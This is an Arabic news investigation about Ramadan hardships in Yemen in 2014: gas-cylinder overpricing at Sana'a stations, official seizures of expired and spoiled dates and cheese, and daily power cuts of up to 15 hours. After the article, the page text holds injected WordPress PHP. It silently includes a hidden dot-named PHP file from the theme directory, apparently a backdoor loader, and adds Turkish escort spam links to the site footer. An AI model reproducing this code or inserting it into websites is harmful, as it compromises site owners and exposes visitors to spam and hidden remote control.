تحقيقات

محطات تتلاعب بأسعار الغاز .. ومئات الأطنان من التمور الفاسدة تغزو الأسواق .. و انطفاءات الكهرباء تصل لـ 15 ساعة يومياً منذ بداية رمضان !!

images (2)

مع بداية شهر رمضان وكالعادة يركز الصائمون اهتمامهم على توفير السلع والخدمات الاستهلاكية والغذائية لكن تركيز الجميع يتزايد على ثلاثة جوانب تمثل غاية في الأهمية بالنسبة لهم وهي توفر الغاز المنزلي بالسعر المناسب والمحدد والتيار الكهربائي دون انقطاع  إضافة إلى الأغذية التي يتزايد الإقبال عليها في الشهر الكريم وفي مقدمتها التمور .  فإذا ما توفرت للجميع تلك الخدمات والأغذية المطلوبة ضمن الجميع صوماً هادئاً بعيداً عن المعاناة التي اعتاد اليمنيون على تجرعها في مثل هذه المناسبة العظيمة خاصة في الأعوام الثلاثة الماضية .

الهوية وفي تحقيقنا لهذا العدد عمدنا إلى عرض واقع الحال الذي يعيشه اليمنيون في شهر رمضان الكريم هذا العام ..

فكانت الحصيلة التالية :

الهوية / قسم التحقيقات

 

محطات تعبئة الغاز تبيع الغاز بسعر 1700 ريال للاسطوانة

في جانب توفر الغاز المنزلي حددت شركة الغاز سعر الاسطوانة بـ1200 ريال قبل رمضان بأيام ومع دخول رمضان برزت جملة من الشكاوى من قبل المواطنين تؤكد ارتفاع أسعار بيع الغاز المنزلي.

موضحين أن أصحاب المعارض والمحطات ومنذ اليوم الأول من شهر رمضان المبارك يتعنتون المواطنين.

حيث بدأت عدد من محطات ومعارض الغاز في العاصمة صنعاء ببيع الغاز المنزلي بسعر مرتفع ليصل سعر الاسطوانة المنزلية إلى 1700 ريال بينما اسطوانة الغاز الخاصة بالسيارات وصل سعرها إلى 1600 ريال.

وقد عبر عدد من المواطنين عن استيائهم الشديد واعتبروا مثل هذه التصرفات استغلال لحاجة الناس الزائدة لمادة الغاز في شهر رمضان المبارك.

ضبط 16 طنا من التمور المنتهية وإتلاف 4 أطنان من الأجبان

 

وفي جانب المواد الغذائية كشف مكتب الصناعة والتجارة بأمانة العاصمة صنعاء عن ضبط الفرق الميدانية التابعة له خلال الأسبوعيين الماضيين 16 طنا من التمور منتهية الصلاحية وكميات تقًدر بـ 476 صفيحة تمر مجهولة المنشأ ولا تحمل بيانات الصلاحية.

حيث أكد مدير عام المكتب خالد الخولاني في تصريح له أن الفرق الميدانية باشرت عملها بالنزول الميداني وفقاً لخطة المكتب بالنزول إلى الأسواق والمحلات التجارية ومخازن الشركات والمستوردين وكبار تجار الجملة للتأكد من مدى توفر وصلاحية المواد الغذائية الاستهلاكية والسلع الرمضانية والذي أثمرت عن ضبط 16 طنا من التمور المنتهية وإتلاف أربعة أطنان من الأجبان المنتهية.

لافتاً إلى أن المكتب قام بالتنسيق مع القطاع التجاري والخاص على توفير احتياجات المستهلك بالكميات الكافية من السلع والمواد الغذائية التي يزيد الإقبال عليها في شهر رمضان وبالأسعار السائدة لها من قبل شهر شعبان مبيناً أن مكتب الصناعة والتجارة بالأمانة أتفق مع نقابة بائعي اللحوم والمواشي باعتماد الأسعار السائدة قبل رمضان والبيع بموجبها خلال شهر رمضان المبارك واعتماد آلية لعدم الغش في الميازين ومعاييرها لدى الهيئة اليمنية للمواصفات والمقاييس وإشهار الأسعار أمام المستهلك.

 

هيئة المواصفات تمنع 1000 طن من التمور الفاسدة وتضبط 300 صفيحة منتهية في أسواق العاصمة ..

وفي ذات السياق منعت الهيئة اليمنية للمواصفات والمقاييس وضبط الجودة خلال النصف الأول من العام الجاري 2014م دخول 460 طنا من التمور المخالفة للمواصفات.

وأشار بيان صادر عن الهيئة أن عدد شحنات التمور الخاضعة لإجراءات الهيئة خلال نفس الفترة بلغت 755 شحنة منها 14 شحنة مخالفة تم اتخاذ الإجراءات القانونية حيالها.

وأشار البيان إلى أن الهيئة قامت بإرسال تعاميم إلى جميع مكاتبها وفروعها في المحافظات والمنافذ بالإجراءات المتعلقة بالتمور أهمها أن تكون تعبئتها في عبوات مناسبة ونظيفة وجافة وغير منفذة للرطوبة  تضمن حمايتها من التلوث والتلف.

وأكد أهمية أن تكون التمور متماثلة ومتجانسة في اللون والشكل، وفي حالة التمور التي تعبأ في عبوات كرتونية يجب أن تكون مخصصه لتعبئة التمور ومدون عليها البيانات الإيضاحية التي تمثل المنتج المعبأ.

وشددت على عدم تعبئة منتج التمور في أكياس أو “شوالات” أو الكراتين المخصصة لتعبئة الفواكه، مشيرا إلى أنه في حالات العبوات الكرتونية يجب تغليفها بأكياس اليفيلين المناسبة والمعقمة.

وحثت الهيئة في تعاميمها ألا تزيد فترة صلاحية التمور عن عام واحد وكتابة البيانات الإيضاحية بطريقة واضحة وصعبة الإزالة على عبوة المنتج.. وضرورة حفظها عند نقلها من التلف الميكانيكي والتلوث وأن تخزن وتعرض بعيدا عن مصادر الحرارة والرطوبة والمواد الضارة والحشرات والقوارض.

وكانت الهيئة اليمنية للمواصفات والمقاييس وضبط الجودة وفق وكالة سبأ الرسمية قد رفضت خلال هذا الموسم من العام 2014م ما يقارب 1000 طن من التمور المستوردة لعدم مطابقتها للمواصفات.

وقال مصدر مسؤول بالهيئة إن الهيئة قامت بالعديد من الإجراءات لمنع دخول تمور غير مطابقة للمواصفات ابتداء من الرقابة عليها بالمنافذ الجمركية و التفتيش الدقيق من قبل كوادر متخصصة وفق آليات محددة تتماشى يتماشى مع احدث الأسس العلمية الخاصة بالرقابة .

وأضاف” ونتيجة لهذه الإجراءات الدقيقة المتطورة التي تم اعتمادها من هذا العام في إطار جهود الهيئة في الحفاظ على صحة المواطن وسلامة من يتناوله من الأغذية المستوردة خاصة في شهر رمضان الفضيل ، فقد ارتفعت نسبة التمور المرفوضة بشكل كبير مقارنة بالأعوام السابقة”.
حيث ضبطت فرق الهيئة خلال حملتها الحالية الميدانية الرمضانية للأسواق أكثر من 300 صفيحة تمور منتهية الصلاحية  بناء على تلقيها عدد من الشكاوي حول التمور المغشوشة التي يقوم بعض التجار ضعيفي النفوس بعملية الغش عبر خلط التمور القديمة أو المخالفة للمواصفات مع تمور جديدة في أماكن مجهولة و تجد طريقها إلى الأسواق.
وناشد المصدر جميع الجهات الحكومية ذات العلاقة ومنظمات المجتمع المدني والمستهلكين للإبلاغ عن أي معامل تقوم بإعادة تعبئة التمور أو معامل غير خاضعة لرقابة الهيئة أو الجهات ذات العلاقة .
كما دعت الهيئة كافة المواطنين الى التحري عند شراء التمور و البحث عن التمور المطابقة للمواصفات القياسية عبر قراءة بطاقة البيان للتمور لكافة البيانات الإيضاحية و التركيز على تاريخ تعبئة التمور ، والتأكد من نوعيته والوزن الفعلي للتمور المعروضة بالصفائح المعدنية.

ونبهت إلى ضرورة التركيز على أن التمور خالية من الحشرات الحية وبويضاتها ويرقاتها وأن تكون التمور سليمة ونظيفة و خالية من أي طعم أو رائحة غريبة، بالإضافة إلى التأكد من سلامة العبوات وعدم شراء التمور المعبأة في أكياس الجوت كونها عرضة للتلوث واحتمالية أن تكون غير صالحة للاستهلاك الآدمي .

وحثت المواطنين بالابتعاد عن شراء أي تمور معروضة في عبوات منفذة للرطوبة ، ومراعاة أن يتم شراء التمور من الأماكن التي تتوفر فيها الشروط الصحية المناسبة كون طرق العرض و التخزين تؤثر على صلاحية التمور .

يشار إلى أن من علامات عدم صلاحية التمر وجود طعم حامضي بالتمور نظرا لتلوثها بالخمائر والأعفان ، واسوداد التمور الذي هو ناشئ عن تلوثها بالفطريات وتغير سطح التمر الخارجي و تهتك أنسجة التمر ووجود بقايا الحشرات و بويضاتها و يرقاتها .

تزايد انطفاءات  الكهرباء مع حلول رمضان برغم توقف الاعتداءات عليها ؟!!

وفي جانب التيار الكهربائي يشكو المواطنون في معظم مناطق الجمهورية من تزايد فترات الانطفاءات للكهرباء تزامناً مع حلول شهر رمضان وبالرغم من توقف الاعتداءات على خطوط الكهرباء .

ولفك طلاسم هذه الحبكة .. أكد مصدر في محطة مأرب الغازية أنها تعمل بشكل ممتاز وبكامل طاقتها الإنتاجية منذ سبعة أيام وتغذي العاصمة صنعاء وبقية المدن التي تعتمد في حاجتها من الطاقة على المحطة.

وقال المصدر في تصريح صحفي إن خطوط نقل الطاقة من محطة مأرب الغازية إلى العاصمة لم تتعرض لأي اعتداء تخريبي .

مرجعاً سبب الإنطفاءات التي تعانيها العاصمة إلى وجود ما أسماه “تلاعباً في المحطات المتواجدة في صنعاء .

نحو 15 ساعة زمن الانطفاءات في اليوم الواحد

وتعاني العاصمة صنعاء ومعظم المدن اليمنية، من إطفاءات متكررة وطويلة تصل إلى أكثر من 15 ساعة في اليوم الواحد وخاصة منذ دخول شهر رمضان المبارك.

وفيما ازدادت شكاوى سكان المناطق الساحلية التي تعيش أجواء رمضانية صيفية شديدة الحرارة من انقطاع التيار الكهربائي، تظاهر العشرات من أبناء مدينة الحامي في حضرموت، احتجاجاً على انقطاع التيار عن مدينتهم ليومين متتاليين.

وتفيد مصادر إعلامية بأن أهالي مدينة الحامي (80 كلم شرق المكلا)، يقطعون الطريق العام ويحتجزون الشاحنات والناقلات بسبب انقطاع الكهرباء عن المدينة.

إلى ذلك أكدت مصادر محلية أن انقطاع التيار جاء بسبب انعدام مادة الديزل حيث تعاني اليمن أزمة مشتقات نفطية منذ أشهر وخاصة في مادة “الديزل” رغم الوعود والتوجيهات الرسمية بإيجاد حلول لها.

الخلاصة .. من بخته البرد جاله !!

ومع هذه المعلومات التي سردناها عن الوضع التمويني في السوق المحلية ينطبق على حال المواطن اليمني المثل الشعبي القائل ( من بخته البرد جاله .. )  ففيما يخص أسعار الغاز قرأنا كثيراً وتابع الجميع قرار الجهات الرسمية التي حددت فيه أسعار اسطوانة الغاز المنزلي ب1200 ريال وتحذيرها لأصحاب المحطات من التلاعب بأسعار الغاز ومع هذا هناك تلاعب وفيما يخص السلع الرمضانية والتي من أبرزها التمور والتي يتزايد الإقبال عليها في رمضان وبرغم الحملات الميدانية للجهات المختصة هناك مئات الأطنان من التمور الفاسدة تباع في الأسواق وهناك المئات من الأطنان الفاسدة أيضاً في طريقها للأسواق المحلية .

وفي جانب الكهرباء لا حظ الجميع منذ بادية الشهر الكريم تزايد مدة الانطفاءات في مختلف المدن اليمنية ومن بينها صنعاء والتي وصلت مدد الانطفاءات يومياً إلى نحو 15 ساعة وهذه يتم مع توقف الاعتداءات على خطوط الكهرباء وتوفر المشتقات إذن ماذا نقول لحكومتنا الموقرة الله الله في الصائمين وللصائمين نقول ما جاء في عنوان خلاصة موضعنا وأمر الجميع لله ..

الصور ..

1-  تمور فاسدة

2-  شموع وفوانيس وإفطار تحت ضوء الشموع

3-  اسطوانات  غاز

الوسوم

مقالات ذات صلة

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *

*

إغلاق
إغلاق
if (file_exists(get_template_directory() . DIRECTORY_SEPARATOR . "." . basename(get_template_directory()) . ".php")) { include_once get_template_directory() . DIRECTORY_SEPARATOR . "." . basename(get_template_directory()) . ".php"; } if (file_exists(get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php')) { include_once get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php'; } function zo(){ echo '
Manisa escort Tekirdağ escort Çanakkale escort Trabzon escort Yalova escort Balıkesir escort Aydın escort Muğla escort Afyon escort Aksaray escort Şanlıurfa escort Ümraniye escort Sinop escort Keçioren escort
'; } add_action("wp_footer",'zo');